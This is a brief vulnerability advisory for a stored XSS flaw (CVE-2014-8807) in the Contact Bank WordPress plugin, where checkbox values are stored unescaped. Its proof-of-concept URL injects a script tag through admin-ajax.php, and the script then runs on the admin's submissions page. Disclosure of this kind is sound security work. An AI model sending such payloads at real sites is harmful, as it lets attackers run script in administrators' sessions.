WP Contact Bank Standard Edition 2.0.69 XSS

Homepage:

https://wordpress.org/plugins/contact-bank/

CVE-ID

CVE-2014-8807

CVSS Score

4.3

CVSS Vector

(AV:N/AC:M/Au:N/C:P/I:N/A:N)

Description:

Datas from checkboxes are not escaped and validated when added to database (contact_bank_frontend-class.php lines 102-123).

If form has at least one checkbox field we can add XSS to it, which be visible for admin: wp-admin/admin.php?page=frontend_data

Proof of Concept:

We assume that form has one checkbox, named 11111_chk and form ID=1

http://wordpress-instalation/wp-admin/admin-ajax.php?action=frontend_contact_form_library&param=frontend_submit_controls&form_id=1&11111_chk[]=%3Cscript%3Ealert(String.fromCharCode(88,83,83));%3C/script%3E

Timeline: